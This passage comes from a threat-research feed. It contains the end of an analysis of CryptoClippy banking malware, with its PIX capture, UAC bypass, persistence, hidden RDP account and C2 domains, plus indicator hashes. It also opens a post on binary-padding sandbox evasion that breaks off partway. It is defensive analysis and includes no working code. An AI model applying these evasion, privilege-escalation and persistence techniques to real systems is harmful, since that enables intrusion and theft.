&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;00020126580014br.gov.bcb.pix0136123e4567-e12b-12d1-a456-426655440000 5204000053039865802BR5913Fulano de Tal6008BRASILIA62070503***63041D3D&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Above, PIX copy-and-paste format as mentioned in the
&lt;a href="https://www.bcb.gov.br/content/estabilidadefinanceira/forumpireunioes/Anexo%20I%20-%20Padr%C3%B5es%20para%20Inicia%C3%A7%C3%A3o%20do%20PIX.pdf"target="_blank" rel="noopener"&gt;document&lt;/a&gt;
of the Central Bank.&lt;/p&gt;
&lt;p&gt;We found no indications of attempts to introduce a new payload into the
clipboard if it detects a PIX string. Instead, the captured content is promptly
sent to the C2 server. Building upon the existing functionality of
CryptoClippy, which involves swapping crypto wallets, we have reason to believe
that this method will persist in future iterations.&lt;/p&gt;
&lt;p&gt;Additionally, we anticipate that the forthcoming version will possess an added
capability — the ability to substitute the intercepted PIX string with one
under the control of the threat actors. This insidious modification would
effectively redirect all payments to their designated account.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig10.png" title="CMSTPLUA CLSID used by the malware in UAC bypass." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;CMSTPLUA CLSID used by the malware in UAC bypass.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Besides the capabilities above, the malware obtains the user name, computer
name, Windows version, and firmware information (using
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-getsystemfirmwaretable"target="_blank" rel="noopener"&gt;GetSystemFirmwareTable&lt;/a&gt;).
It queries the value ‘RSMB’ repressing the SMBIOS firmware table provider. Then
it opens the registry key &lt;code&gt;SOFTWARE\\GbPlugin\\Uni&lt;/code&gt; and gets the value of
&lt;code&gt;gFaYEcJ9U3dI&lt;/code&gt; and &lt;code&gt;gFaYEcJ9U3RB&lt;/code&gt;. The key is created by a plugin called
&lt;code&gt;gbplugin&lt;/code&gt; whose purpose is to secure the connection to internet banking
services. It is not clear what sort of information is stored in these registry
entries, but all of the information that was collected in this stage is sent to
the C2.&lt;/p&gt;
&lt;h3&gt;Persistence&lt;span class="hx:absolute hx:-mt-20" id="persistence"&gt;&lt;/span&gt;
&lt;a href="#persistence" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;As reported, the malware sets persistence on the victim machine by creating an
LNK at
&lt;code&gt;AppData\Roaming\Microsoft\Windows\Start\ Menu\Programs\Startup\Reposita.lnk&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We identified a unique way in which the malware creates the LNK file. It calls
the
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cocreateinstance"target="_blank" rel="noopener"&gt;CoCreateInstance&lt;/a&gt;
function, creating an object of the class specified by the
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/com/clsid-key-hklm"target="_blank" rel="noopener"&gt;CLSID&lt;/a&gt;
value. CLSID is a unique identifier of a COM class object. In our case, the
CLSID is &lt;code&gt;{000214EE-0000-0000-C000-00000000046}&lt;/code&gt;. Looking up this value, we get
only two results (the top result is Portuguese):&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig11.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;This handler points to the IShellLinkA interface, which provides methods for
working with Shell links – LNK files. The target of the LNK file is the bat
file from the second stage (&lt;code&gt;Repoista.bat&lt;/code&gt;). This script is responsible for
executing the PowerShell script that injects the loader.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig12.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The malware contains 3 scripts that are executed in different stages of the
malware execution. The name of the scripts changes between samples since it
depends on the configuration. All of the scripts are encoded using RC4. As
described by Unit42, one of the files creates a scheduled task for persistence,
and a BAT file executes the script – the 2nd script dropped by the malware. We
noticed a unique way the malware executes the bat file with elevated
permissions.&lt;/p&gt;
&lt;p&gt;First, it queries the TokenInfomration of the process using
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-gettokeninformation"target="_blank" rel="noopener"&gt;GetTokenInformation&lt;/a&gt;
and checks if the process has already elevated permissions using TokenElevation
class. If so, it will execute the bat file. Otherwise, it will check the
security policy by checking the registry value at
&lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System&lt;/code&gt;. If the value is
one of the following: EnableLUA, ConsentPromptBehaviorAdmin, or
ConsentPromptBehaviorUser – the trojan will not execute the script at all. If
none of these values are set, it checks the value of
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/winnt/ne-winnt-token_elevation_type_"target="_blank" rel="noopener"&gt;TOKEN_ELEVATION_TYPE&lt;/a&gt;
to examine the token type. If the value is TokenElevationTypeLimited (numerical
value 3), it will use the CMSTPLUA COM &lt;code&gt;{3E5FC7F9-9A51-4367-9063-A120244FBEC7}&lt;/code&gt;
interface to bypass UAC and execute the script with elevated permissions. This
technique was previously used by other threats, such as
&lt;a href="https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/#:~:text=%20the%20ransomware%20can%20perform%20privilege%20escalation%20using%20the%20cmstplua%20com%20interface%20and%20achieves%20persistence%20by%20installing%20itself%20as%20a%20service.%20"target="_blank" rel="noopener"&gt;DarkSide ransomware&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig13.png" title="CMSTPLUA CLSID used by the malware in UAC bypass." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;CMSTPLUA CLSID used by the malware in UAC bypass.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;If the token elevation type is TokenElevationTypeDefault, the malware will use
&amp;ldquo;runas&amp;rdquo; to execute the script as an administrator.&lt;/p&gt;
&lt;p&gt;The third script we decoded is responsible for enabling and setting up a
configuration for the Remote Desktop Service. The script configures the port
for the connection, it sets the SecuirtyLayer to be on the lowest level, which
specifies that the Microsoft Remote Desktop Protocol (RDP) will be used by the
server and the client for authentication before a remote desktop connection is
established, it sets the userAuthentication to 0 -which specifies that
Network-Level user authentication is not required before the remote desktop
connection is established. Lastly, using a user name passed as an argument to
the script, the script creates a new user account and appends it to:
&lt;code&gt;HKLM\SOFTWAREM\icrosoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt;
to hide it from winlogon.&lt;/p&gt;
&lt;p&gt;The script also sends information about the endpoint to the C2. The data
contains the OS version, computer name, architecture, and indicators on
whatever rdpclip.exe and rfxvmt.dll are present on the endpoint. Rdclip allows
to use of the clipboard during remote desktop sessions, and rfxvmt implements
&lt;a href="https://learn.microsoft.com/en-us/virtualization/community/team-blog/2010/20100317-explaining-microsoft-remotefx"target="_blank" rel="noopener"&gt;RemoteFX&lt;/a&gt;,
a collection of graphical functionalities designed to enhance remote
connections. However, it was
&lt;a href="https://support.microsoft.com/en-us/topic/kb4570006-update-to-disable-and-remove-the-remotefx-vgpu-component-in-windows-bbdf1531-7188-2bf4-0de6-641de79f09d2"target="_blank" rel="noopener"&gt;deprecated&lt;/a&gt;
due to many security vulnerabilities.&lt;/p&gt;
&lt;p&gt;In the sample we inspected, the function that generates folder and mutex names
uses the same proprietary algorithm, but the format is changed to &amp;ldquo;%ls%08x,&amp;rdquo;
and the constant passed to the function is 0x973C8F.&lt;/p&gt;
&lt;h3&gt;Network&lt;span class="hx:absolute hx:-mt-20" id="network"&gt;&lt;/span&gt;
&lt;a href="#network" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The domain name of the C2, as we see in the sample we analyzed, is
&lt;code&gt;flowmudy[.]com&lt;/code&gt;. The URL that is being sent is in the format of:
&lt;code&gt;https://flowmudy.com/?act=481c&lt;/code&gt;. The value of &amp;ldquo;act&amp;rdquo; changes depending on the
function that initiates the communication. The user agent is stored in the
hardcoded configuration into the executable and encoded with RC4. CryptoClippy
uses two different configurations- one is the pf file received from the remote
server in the first stage of the attack, and the second is hardcoded in the
.data section of the malware. The first configuration file contains encoded
script names and content, crypto wallet addresses, and the domain name of the
C2 servers. The latter contains the URL format described above and the
following user agent.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;%s %s HTTP/1.1
Host: %.*s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Length: %d&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The decoded user agent, above.&lt;/p&gt;
&lt;h3&gt;Conclusions of CryptoClippy Analysis&lt;span class="hx:absolute hx:-mt-20" id="conclusions-of-cryptoclippy-analysis"&gt;&lt;/span&gt;
&lt;a href="#conclusions-of-cryptoclippy-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In conclusion, our analysis of CryptoClippy has revealed its rapid evolution,
expanding from basic crypto wallet theft to reconnaissance gathering and
extracting critical payment application and transaction information from
unsuspecting victims in Brazil. Evidence suggests upcoming enhancements that
will further expand its capabilities. Organizations and individuals must stay
abreast of emerging trends and fortify their security defenses to combat this
rapidly evolving menace effectively.&lt;/p&gt;
&lt;h2&gt;IOCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h2&gt;DLL loader&lt;span class="hx:absolute hx:-mt-20" id="dll-loader"&gt;&lt;/span&gt;
&lt;a href="#dll-loader" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;894ad71e6fea9a5068512a7de5c2b176bc9556acf96284f131614d0e402059dc&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;02af8c455fc32e0e79d5b7be2d6349ddc95d747528e328715325947217933dac&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;.NET loader&lt;span class="hx:absolute hx:-mt-20" id="net-loader"&gt;&lt;/span&gt;
&lt;a href="#net-loader" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;19f0f8831ef9d561f6dc395eff55d165d614fa06d13a9a3d39b120ef18242f12&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;NSIS Installers&lt;span class="hx:absolute hx:-mt-20" id="nsis-installers"&gt;&lt;/span&gt;
&lt;a href="#nsis-installers" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;bb242ec30689f12d10986832a8548f23b06a7c1b5988797a48c6237fd51cde49&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0b88fed305f93003c520c9c8d06d93ff8f3530548423efcbc3cdff582c23d66f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0cab35abbec588c09219ae34c4cee65eed1e980345f6d0ade152d330a4ae2c9b&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1633762047d7fc1c583e5fa358cb24b6408ceec1cf1f4f2a31f1c8aa1371c1c7&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;30976656db4334e494615b0e893b001045f4714259b8089bbcfca59203a0ce3d&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;32ad6008209b9a48e5c0fdad6b2bcd5dd374a9c273d99d82a339939f450d6f42&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;3d18564402263bb7e7f9091b154990c3c15cbd8d86610a23b389fb1e5fc65723&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;417f2fc47353b84b56cc5f438d53570901740037a41012d6f4d3168cbd40a7ff&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;49300936a4e0986e98bbb681312b18e4305fb3fd5f53e31985721e267745cff5&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;4f9e65266f0842856dfba4d1d3c9dc278e5521ef3ca521f1726ed1d1e8a547df&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;64ecc4d34f45662b32387008b5d81b21bd995af399a6957ca2c1441756073307&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;6768e39b94159e39b517250a047a2e043f9cd4e360c12c19d88113aa475f1ca6&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;6dc5788049de41f09f32ffe2c84c715353efe32536fccb9c44254de8e8eae575&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;7861b9c78ae234bb636bf67b369a19bbcf83092f999a85397d25a08626f79bd6&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;8446de8cdcddf6b7e023fbe353e69d51a6cb4105c52709a618e88b2ac77645ad&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;8784e81c8aa147548f057c3b162a7c717fddc450028a4c3dc4271eead5b2a68a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;8bdcea1224ef19f6c00986c2b06754d132ead4a602147b0db8d1adda35a64914&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;94f2e8062a586486528c6eef2a6302106ae3eb69eba3cb1e37d77f22024a8496&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;97abe330295c853554e516cb2ac946f053696c5396e755b2abd7606a4e24d82e&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9dc2dc7cb68b26395de3840f096ddae825681cb86c4facb054da81708cebe970&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ab053769b445fb833f11f65e1ec2f238ffd14dd38c5173f755133caae0ed425d&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b2a18f5dc63c87bbb39b8b7e722bfc83b75e3fc15a5367ead1b2e5c74be7f30a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b33e440e1af58cf61543158123699dcc21716d1fbf820bb36b578b0da2da8e26&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bb242ec30689f12d10986832a8548f23b06a7c1b5988797a48c6237fd51cde49&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bf71c9f9b2eacbd02bdb0296cdf2533df41a8ec53e894af91a720cfaefa84066&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;c1a8f5a1eaa54d7a895afe298e41ccc2acc018133bea1588eb00d1c04d809b4f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;c4a6c74441fa701ee5568420ed0d930b2636d46239b7558df946de26a026af4e&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;d76ffe1bd489d2c1e2ed5c64849aeffe23d4ffe82597e40a030e9a634305b07f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;d9ba0ffebeff80a7d19dfd9b848b5e96dfda72a4b8f749bd5032145abd7eb86f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dd8e58d3dfcb3ba2675638ccf36dbdb90fce4f29e9c91256269218d8b6431763&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;f99351a25ae8890fa91674a5ce54ce4ff8d46c3e93f16debc0852d4d8431d49b&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fa5f1116478d45d74c2ed175a0c507abcdeedf07096e3a43144fa19cec427575&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bdd98909fb388401919b5fd465e54266845cd74e75f60ff97703fabc35664a9a&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;CryptoClippy samples&lt;span class="hx:absolute hx:-mt-20" id="cryptoclippy-samples"&gt;&lt;/span&gt;
&lt;a href="#cryptoclippy-samples" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;d2c85de7c763e8d8990d06f78f226fda36443253c63678c7c0e998499f3af61a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;02af8c455fc32e0e79d5b7be2d6349ddc95d747528e328715325947217933dac&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Domains used by the loader&lt;span class="hx:absolute hx:-mt-20" id="domains-used-by-the-loader"&gt;&lt;/span&gt;
&lt;a href="#domains-used-by-the-loader" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;http://ef0h[.]com/1/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;http://4a3d[.]com/1/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;http://b3do[.]com/1/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;http://yogarecap[.]com/1/&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Domains used by the malware&lt;span class="hx:absolute hx:-mt-20" id="domains-used-by-the-malware"&gt;&lt;/span&gt;
&lt;a href="#domains-used-by-the-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;nicerypx[.]com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;flowmudy[.]com&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>How Hackers Use Binary Padding to Outsmart Sandboxes and Infiltrate Your Systems</title><link>https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/</link><pubDate>Thu, 18 May 2023 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/</guid><description>
&lt;p&gt;Binary padding is the process of adding extra or junk data to a portable
executable (PE) file that, while not changing the behavior of the binary,
changes certain characteristics that can help with either obfuscating relevant
code or defeating sandboxing solutions and detections.&lt;/p&gt;
&lt;p&gt;This technique is not novel. It has been employed in various forms for several
years to achieve different effects, all of which are related to evading defense
mechanisms. So why are we talking about it now? We have noticed recently a lot
of phishing campaigns using binary padding while targeting victims, for example
&lt;a href="https://www.trendmicro.com/en_us/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html"target="_blank" rel="noopener"&gt;Emotet&lt;/a&gt;
and
&lt;a href="https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/"target="_blank" rel="noopener"&gt;QBot&lt;/a&gt;.
(&lt;a href="#pufferphishing-binary-padding-combined-with-compression"&gt;Skip down to read more about this “PufferPhishing” technique.&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;This blog will take a look into the what, the why, and the who when it comes to
binary padding as an evasive technique for cyberattacks.&lt;/p&gt;
&lt;h2&gt;Why Would Attackers Use Binary Padding?&lt;span class="hx:absolute hx:-mt-20" id="why-would-attackers-use-binary-padding"&gt;&lt;/span&gt;
&lt;a href="#why-would-attackers-use-binary-padding" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Historically, malware was small in size. A lot of logic for malware can be
programmed into a very small executable. A small size for malware was a
requirement not long ago, as computers had slower internet and not a huge
amount of RAM. Large binaries used to be limited to files like installers or
games, as these contain a large amount of resources such as extra files, images
and libraries in order to function. Over 10 years ago, if a file was very
large, for example over 5 MB in size, it would have been an indicator of
non-maliciousness.&lt;/p&gt;
&lt;p&gt;These days not so much. As computers today have magnitudes more memory and disk
space compared to twenty years ago, file size of a binary became less of an
issue. This has allowed new compilers and programming languages to optimize
differently without considering the final binary size. New programming
languages such as Rust and Go default to statically link libraries to the final
binary which helps improve performance, but results in a larger final binary.
For example, a “Hello, World”
&lt;a href="../../../2021/12/all-your-go-binaries-are-belong-to-us/"&gt;Go binary&lt;/a&gt; has a size
in the megabytes.&lt;/p&gt;
&lt;p&gt;Binary padding comes with many benefits for malware authors, let’s discuss a
few of them and the pros and cons for each.&lt;/p&gt;
&lt;h3&gt;Binary Padding Can Defeat Sandboxes with Size Limits&lt;span class="hx:absolute hx:-mt-20" id="binary-padding-can-defeat-sandboxes-with-size-limits"&gt;&lt;/span&gt;
&lt;a href="#binary-padding-can-defeat-sandboxes-with-size-limits" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;One of the most simple reasons for binary padding is to simply make the file
bigger! This attempts to avoid analysis from automated malware analysis tools,
such as
&lt;a href="https://intezer.com/blog/alert-triage/the-evolution-of-sandboxing/"target="_blank" rel="noopener"&gt;traditional sandboxes&lt;/a&gt;,
since most have an upper limit on the size of files being submitted. It also
hinders analysis of the file as someone trying to submit the file might not be
able to upload such a large file in reasonable time limits, since the upload
requires network transfer to the sandbox. This simple but effective technique
allows malware to avoid being analyzed by virtue of being &lt;em&gt;too big to fit in
the front door&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;For security vendors, the solution is simple: raise the limit of file size.
This arms race comes with added costs for security vendors, but also adds cost
to the malware author, the larger they need to make their malware to usurp the
limits also makes the malware much bulkier and harder to transport to the
victim. (There is an easy method that malware authors are able to use to make
their inflated files easier to transport that we will talk about
&lt;a href="#pufferphishing-binary-padding-combined-with-compression"&gt;later in this blog&lt;/a&gt;.)&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig1.jpeg" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Exceeding Sandbox Size Limits with Binary Padding&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pros for the attacker&lt;/th&gt;
&lt;th&gt;Cons for the attacker&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Simple to implement for the malware author&lt;/td&gt;
&lt;td&gt;Easy for cybersecurity tools to detect&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Effectively defeats most sandbox solutions&lt;/td&gt;
&lt;td&gt;Malware with binary padding can be reversed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multiple ways to achieve&lt;/td&gt;
&lt;td&gt;Hard to transport files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Does not defeat tools with no size limit&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Using Binary Padding to Change the Hash&lt;span class="hx:absolute hx:-mt-20" id="using-binary-padding-to-change-the-hash"&gt;&lt;/span&gt;
&lt;a href="#using-binary-padding-to-change-the-hash" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;“I’m not like other executables.” Binary padding can also be used to
&lt;a href="../../../2022/05/threat-hunting-sigma-detection-rules/#:~:text=a%20file%E2%80%99s%20hash%20is%20the%20easiest%20indicator%20to%20find%20and%20to%20detect%20but%20it%20is%20also%20trivial%20for%20threat%20actors%20to%20modify%20it%20simply%20by%20changing%20one%20bit%20in%20a%20file."&gt;change the hash for a malware&lt;/a&gt;.
This technique can be effective to avoid hash-based detections, but not systems
with genetic-based detection. The technique is achieved by a malware creating a
copy of itself and inserting random data into it, thus ensuring that a
cryptographic hash, for example MD5 or SHA, of the file will be unique for
each. It is easy to achieve as only one bit is needed to be changed to change
the hash.&lt;/p&gt;
&lt;p&gt;The reason why this works is due to a concept in cryptography called
&lt;a href="https://en.wikipedia.org/wiki/Confusion_and_diffusion"target="_blank" rel="noopener"&gt;diffusion&lt;/a&gt;. Diffusion
means that if one bit of an input into a cryptographic hashing function is
changed, then much of the output (digest) is also changed. This means that
similar inputs do not produce similar outputs, hiding any relationship between
the digest and the plaintext. This has the effect of avoiding hash-based
detections, as we can see it is trivial to change the hash. This is less of an
effective technique as most modern malware detection solutions have
&lt;a href="http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html"target="_blank" rel="noopener"&gt;moved beyond&lt;/a&gt;
hash-based and use genetic, signature, or behavior-based detections.&lt;/p&gt;
&lt;p&gt;An example with the string diffusion:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;String&lt;/th&gt;
&lt;th&gt;MD5 Hash Digest&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Diffusion&lt;/td&gt;
&lt;td&gt;c9fc4714730359980e89007f327c5b7d&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Diffuzion&lt;/td&gt;
&lt;td&gt;2e24821ec7e23fe19d8ec494a801928a&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Notice how changing one letter completely changes the above hash digest?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Binary Padding to Create Unique Hashes&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pros for the attacker&lt;/th&gt;
&lt;th&gt;Cons for the attacker&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Easy to achieve for the malware author&lt;/td&gt;
&lt;td&gt;Slightly antiquated, it does not defeat more modern malware detection methods such as signatures or genetic detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defeats hash-based detections&lt;/td&gt;
&lt;td&gt;Often requires the malware to create a copy of itself to modify, which can be suspicious behavior to detect in itself&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multiple ways to achieve&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;An example of this technique being used is by the Orangeworm group with their
&lt;a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"target="_blank" rel="noopener"&gt;Kwampirs backdoor&lt;/a&gt;;
it achieves it by inserting a randomly generated string into the middle of the
binary.&lt;/p&gt;
&lt;h3&gt;Binary Padding for Obfuscation&lt;span class="hx:absolute hx:-mt-20" id="binary-padding-for-obfuscation"&gt;&lt;/span&gt;
